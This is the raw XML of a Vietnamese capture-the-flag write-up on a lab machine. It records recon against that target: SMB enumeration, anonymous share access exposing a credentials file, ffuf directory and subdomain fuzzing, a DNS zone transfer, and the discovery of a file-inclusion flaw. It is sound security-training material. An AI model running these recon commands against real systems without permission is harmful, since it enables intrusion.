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E177D4" w14:textId="504E0A48" w:rsidR="00ED5725" w:rsidRPr="00ED5725" w:rsidRDefault="00ED5725">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5725">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D19F0B" w14:textId="25BDB550" w:rsidR="002F49FE" w:rsidRPr="005360D1" w:rsidRDefault="00D069EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005360D1">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44ED98A5" wp14:editId="51BADFED">
            <wp:extent cx="5943600" cy="2971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C3C7" w14:textId="506F0505" w:rsidR="005360D1" w:rsidRDefault="005360D1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E207AD7" w14:textId="67C83428" w:rsidR="005360D1" w:rsidRDefault="005360D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Dịch vụ ftp không cho đăng nhập anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0685E416" w14:textId="598BD5A4" w:rsidR="005360D1" w:rsidRDefault="005360D1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="648FD083" w14:textId="0D8FD0C0" w:rsidR="005360D1" w:rsidRDefault="00C95A4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Tìm kiếm public exploit các dịch vụ mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6147FCDC" w14:textId="21BC7D15" w:rsidR="00C95A42" w:rsidRDefault="00C95A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57175D74" w14:textId="4887E9D6" w:rsidR="00C95A42" w:rsidRDefault="0055621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Mình sẽ quét riêng cổng 445 để khám phá phiên bản của dịch vụ SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122A14B" w14:textId="3E473FD6" w:rsidR="0055621C" w:rsidRDefault="0055621C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139DB5A8" w14:textId="200A5A68" w:rsidR="001B252A" w:rsidRPr="005360D1" w:rsidRDefault="0055621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Quét riêng cổng 443 để khám phá chứng chỉ SSL/TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34288633" w14:textId="7CE5B2EC" w:rsidR="005360D1" w:rsidRPr="005360D1" w:rsidRDefault="005360D1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D262646" w14:textId="74AC4F90" w:rsidR="00D069EF" w:rsidRPr="005360D1" w:rsidRDefault="001B252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1753310" wp14:editId="186CC236">
            <wp:extent cx="5943600" cy="15182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E457" w14:textId="599A0039" w:rsidR="00D069EF" w:rsidRDefault="006869F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CCB8DDC" wp14:editId="0F9A3C8C">
            <wp:extent cx="5943600" cy="25609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77D93" w14:textId="2E693556" w:rsidR="00786FC3" w:rsidRDefault="00786FC3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15300248" w14:textId="2CD21315" w:rsidR="00786FC3" w:rsidRDefault="00786FC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Liệt kê dịch vụ SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1232D58A" w14:textId="4336B87E" w:rsidR="00786FC3" w:rsidRDefault="00786FC3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25509DCE" w14:textId="0BD31D4D" w:rsidR="00786FC3" w:rsidRPr="00786FC3" w:rsidRDefault="00786FC3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786FC3">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enum4linux -a 10.10.10.123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D17BE35" w14:textId="52E8C9AD" w:rsidR="00786FC3" w:rsidRDefault="00786FC3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478DC432" w14:textId="01FF6A14" w:rsidR="00786FC3" w:rsidRDefault="00786FC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6E4A44D" wp14:editId="2DFA9A55">
            <wp:extent cx="5943600" cy="26295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52169" w14:textId="177A7ECB" w:rsidR="00786FC3" w:rsidRDefault="00786FC3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515EE512" w14:textId="3AE7A07B" w:rsidR="00786FC3" w:rsidRDefault="007E4B6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Anonymous kết nối được general và Development share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630472DC" w14:textId="28526E6D" w:rsidR="007E4B65" w:rsidRDefault="007E4B65">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D630D75" w14:textId="20BC3E6A" w:rsidR="0080336F" w:rsidRDefault="0080336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Development share không có gì cả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B32A11" w14:textId="474BDC0A" w:rsidR="0080336F" w:rsidRDefault="0080336F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EB3B01E" wp14:editId="34D76BB5">
            <wp:extent cx="5943600" cy="18141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54AF1" w14:textId="63531F6B" w:rsidR="0080336F" w:rsidRDefault="0080336F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E93633" w14:textId="65A1E822" w:rsidR="0080336F" w:rsidRPr="00786FC3" w:rsidRDefault="00C766D0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General share có tệp tài khoản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537A504F" w14:textId="21F7C101" w:rsidR="00970483" w:rsidRDefault="0080336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8B3FF3B" wp14:editId="03211C97">
            <wp:extent cx="5943600" cy="22231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5B703" w14:textId="0F5357A4" w:rsidR="00970483" w:rsidRDefault="00970483">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B55E8A7" w14:textId="68DC434C" w:rsidR="00C766D0" w:rsidRDefault="00C766D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33B27CB" wp14:editId="72D4CD7E">
            <wp:extent cx="3492500" cy="1130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5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EA36F" w14:textId="02FF9DBD" w:rsidR="00C766D0" w:rsidRPr="00817AEE" w:rsidRDefault="00817AEE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Đăng nhập bằng dịch vụ SSH không được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383486A6" w14:textId="5CED3CC7" w:rsidR="00C766D0" w:rsidRDefault="00C766D0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697E9022" w14:textId="376C56B9" w:rsidR="00ED5725" w:rsidRPr="00ED5725" w:rsidRDefault="00ED5725">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5725">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A01AA0" w14:textId="747E45E0" w:rsidR="006869F0" w:rsidRDefault="0097048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C9CCE7B" wp14:editId="1481ED76">
            <wp:extent cx="5473700" cy="1219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B8C07" w14:textId="0C47A085" w:rsidR="00ED5725" w:rsidRDefault="00ED5725">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480DFB04" w14:textId="0E4E5476" w:rsidR="00107D1D" w:rsidRDefault="008C2E9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Giao diện trang web chỉ là 1 cái hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0ADF72" w14:textId="28D472A7" w:rsidR="008C2E95" w:rsidRDefault="008C2E95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B796868" wp14:editId="5FD5D18A">
            <wp:extent cx="4324661" cy="2902457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32" t="21853" r="21694"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4325400" cy="2902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F2A23" w14:textId="77777777" w:rsidR="008C2E95" w:rsidRDefault="008C2E95">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4B928A" w14:textId="5B63B6F9" w:rsidR="006869F0" w:rsidRDefault="00107D1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Recon thư mục chỉ ra được /wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6F453A" w14:textId="16BF8296" w:rsidR="00107D1D" w:rsidRDefault="00107D1D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C017707" w14:textId="67EE64A2" w:rsidR="00107D1D" w:rsidRPr="00524D77" w:rsidRDefault="00107D1D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524D77">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf -w ./wordlists/directory-list-1.0.txt -u http://10.10.10.123/FUZZ -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9793A3" w14:textId="17C08021" w:rsidR="00107D1D" w:rsidRDefault="00107D1D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CE9FE1" w14:textId="4E31D345" w:rsidR="00107D1D" w:rsidRDefault="0080323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</w:t>
      </w:r>
      <w:r w:rsidR="00AF1151">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ình luôn gặp khó khăn khi tìm thư mục bị ẩn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DBF55B" w14:textId="032A4119" w:rsidR="00107D1D" w:rsidRDefault="0080323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301E1AF" wp14:editId="378B421D">
            <wp:extent cx="5943600" cy="10496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00B5E" w14:textId="0D90B9DE" w:rsidR="00717DEB" w:rsidRDefault="00717DEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04374446" w14:textId="26CC6200" w:rsidR="00717DEB" w:rsidRDefault="00717DE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Tên miền lấy từ chứng chỉ SSL khi mình quét chi tiết cổng 443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D8678E" w14:textId="4E0965FC" w:rsidR="005C7FDD" w:rsidRDefault="005C7FDD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599A659D" w14:textId="055187A6" w:rsidR="005C7FDD" w:rsidRPr="00BF65C9" w:rsidRDefault="005C7FDD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF65C9">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>commonName=friendzone.red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CDA719" w14:textId="52F448E3" w:rsidR="00B241DD" w:rsidRDefault="00B241DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009D0BED" w14:textId="5597ED79" w:rsidR="00BC0F0B" w:rsidRDefault="00BC0F0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Lưu ý: có 2 dịch vụ web đang chạy ở cổng 80 và 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E12A0" w14:textId="3F9D4B88" w:rsidR="00BC0F0B" w:rsidRDefault="00BC0F0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508FA674" w14:textId="1A45E271" w:rsidR="00BC0F0B" w:rsidRDefault="00B41B2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Kiểm tra trang web ở cả hai cổng trong trường hợp là địa chỉ IP và tên miền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E508F" w14:textId="77777777" w:rsidR="00B41B26" w:rsidRDefault="00B41B26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B0B808" w14:textId="2912B837" w:rsidR="00B41B26" w:rsidRDefault="008C0EC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Nếu là địa chỉ IP, thì trang web ở cổng 80 hoạt động còn 443 thì không. Kiểm tra tên miền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFAFBC" w14:textId="77777777" w:rsidR="00B41B26" w:rsidRDefault="00B41B26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BD3A11" w14:textId="0F52BBCD" w:rsidR="00BC0F0B" w:rsidRDefault="00BC0F0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http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC0F0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>friendzone.red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD9D6AD" w14:textId="664454BD" w:rsidR="00BC0F0B" w:rsidRDefault="00BC0F0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DD12DF2" wp14:editId="0C4B6520">
            <wp:extent cx="4922208" cy="3729519"/>
            <wp:effectExtent l="0" t="0" r="5715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5013" cy="374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BED6A" w14:textId="67BA0837" w:rsidR="00BC0F0B" w:rsidRDefault="00BC0F0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFB4768" w14:textId="42528B87" w:rsidR="00BC0F0B" w:rsidRDefault="00BC0F0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0F0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC0F0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://friendzone.red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BF98E6" w14:textId="0E1EDF78" w:rsidR="00BC0F0B" w:rsidRDefault="00BC0F0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CD9870B" wp14:editId="56DB9214">
            <wp:extent cx="4787757" cy="3939157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9411" cy="395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C6131" w14:textId="33FD55DD" w:rsidR="00B41B26" w:rsidRDefault="00B41B2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Hai trang web khác nhau</w:t>
      </w:r>
      <w:r w:rsidR="008C0EC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, vậy là mình có thêm mục tiêu để tấn công. Nhưng vì thời gian có hạn, mình sẽ ưu tiên thăm dò và tấn công trên trang web https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43793A12" w14:textId="77777777" w:rsidR="00BC0F0B" w:rsidRDefault="00BC0F0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703FC9C4" w14:textId="5EC76957" w:rsidR="00B241DD" w:rsidRDefault="00B241D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Mình quen việc tìm thư mục bị ẩn mà quên mất còn subdomain, vhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2321279E" w14:textId="49F99949" w:rsidR="00B241DD" w:rsidRDefault="00B241DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077A6AE7" w14:textId="3921E932" w:rsidR="00B241DD" w:rsidRDefault="00B241DD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Bước recon này ngấu mình khá nhiều thời gian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FBF98E" w14:textId="6ED83288" w:rsidR="00B241DD" w:rsidRDefault="00B241DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D524822" w14:textId="72E81724" w:rsidR="005C7FDD" w:rsidRPr="006630E4" w:rsidRDefault="000E2B1A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006630E4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf -w ./wordlists/subdomains-top1million-5000.txt -u http://FUZZ.friendzone.red -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBE0864" w14:textId="6454B001" w:rsidR="000E2B1A" w:rsidRDefault="000E2B1A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF101BD" w14:textId="41E07863" w:rsidR="000E2B1A" w:rsidRDefault="0027343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521734E" wp14:editId="24A0A4D6">
            <wp:extent cx="5943600" cy="55372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B44FD" w14:textId="77777777" w:rsidR="006630E4" w:rsidRDefault="006630E4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F166CDF" w14:textId="7502974B" w:rsidR="00273434" w:rsidRDefault="006630E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Mình quét subdomain khá chậm (mỗi giây một request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F72FBF9" w14:textId="793976AA" w:rsidR="006630E4" w:rsidRDefault="006630E4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8A57A9" w14:textId="3EBE04B8" w:rsidR="006630E4" w:rsidRDefault="006630E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Khám phá subdomain bằng DNS Zone Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC7D479" w14:textId="7F2EE053" w:rsidR="006630E4" w:rsidRDefault="006630E4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B379122" w14:textId="7CAF2D36" w:rsidR="00717DEB" w:rsidRPr="006630E4" w:rsidRDefault="006630E4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006630E4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dig axfr friendzone.red @10.10.10.123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD3B9B8" w14:textId="4CD2241D" w:rsidR="00717DEB" w:rsidRDefault="006630E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0ACB5EC" wp14:editId="07366520">
            <wp:extent cx="5943600" cy="21532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03BCF" w14:textId="45016EE3" w:rsidR="006E2598" w:rsidRDefault="006E2598">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6307C40B" w14:textId="68CF2C7B" w:rsidR="006E2598" w:rsidRDefault="006E2598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13A11D7" wp14:editId="54054259">
            <wp:extent cx="5943600" cy="7385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6BA2" w14:textId="56DF50DC" w:rsidR="006E2598" w:rsidRDefault="006E2598">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B864D43" w14:textId="368AC99D" w:rsidR="008C0EC9" w:rsidRDefault="008C0EC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Duyệt </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0EC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://administrator1.friendzone.red/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, bạn sẽ thấy 1 form đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C885668" w14:textId="0F7E1950" w:rsidR="008C0EC9" w:rsidRDefault="008C0EC9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DB4663F" wp14:editId="4C997783">
            <wp:extent cx="5943600" cy="52355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DC5D6" w14:textId="06BB904B" w:rsidR="00B856F3" w:rsidRDefault="00B856F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649B2FF0" w14:textId="38D9746D" w:rsidR="00B856F3" w:rsidRDefault="007A390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Giao diện trang admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280CFEA8" w14:textId="0C34E197" w:rsidR="007A3901" w:rsidRDefault="007A390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CE3206C" wp14:editId="3FB7E0B9">
            <wp:extent cx="4170350" cy="18587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18" t="19643" r="20995" b="30303"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4171684" cy="1859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F232A" w14:textId="65F2E1E9" w:rsidR="007A3901" w:rsidRDefault="007A3901">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D1A06E" w14:textId="042BAA25" w:rsidR="007A3901" w:rsidRDefault="007A3901">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2AFFCC" w14:textId="7EA3EAFB" w:rsidR="0031750D" w:rsidRDefault="0031750D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080ADE51" w14:textId="7801BAE7" w:rsidR="00E53EF2" w:rsidRDefault="0031750D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BBF5835" wp14:editId="28634A71">
            <wp:extent cx="5280025" cy="2465798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14" t="19364" r="4227" b="14241"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5281408" cy="2466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6C2F11" w14:textId="5256A8D1" w:rsidR="006E3C28" w:rsidRDefault="006E3C28">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE52680" w14:textId="765F4F5E" w:rsidR="006E3C28" w:rsidRDefault="006E3C2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Dùng ffuf để quét tham số pagename: timestamp, login, dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FD91C2" w14:textId="77777777" w:rsidR="006E3C28" w:rsidRDefault="006E3C28">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557CC1ED" w14:textId="2F91AF8D" w:rsidR="006E3C28" w:rsidRDefault="006E3C28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5B969F4" wp14:editId="231C186A">
            <wp:extent cx="5943600" cy="11569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86E99" w14:textId="2ED2672F" w:rsidR="006E3C28" w:rsidRDefault="006E3C28">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CD3264" w14:textId="6734B158" w:rsidR="006E3C28" w:rsidRDefault="006E3C2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Trang dashboard.php đã include trang timestamp.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7121BE" w14:textId="11156A87" w:rsidR="006E3C28" w:rsidRDefault="006E3C28">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006E3C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tham số pagename bị dính lỗ hổng File Inclusion</w:t>
      </w:r>
    </w:p>
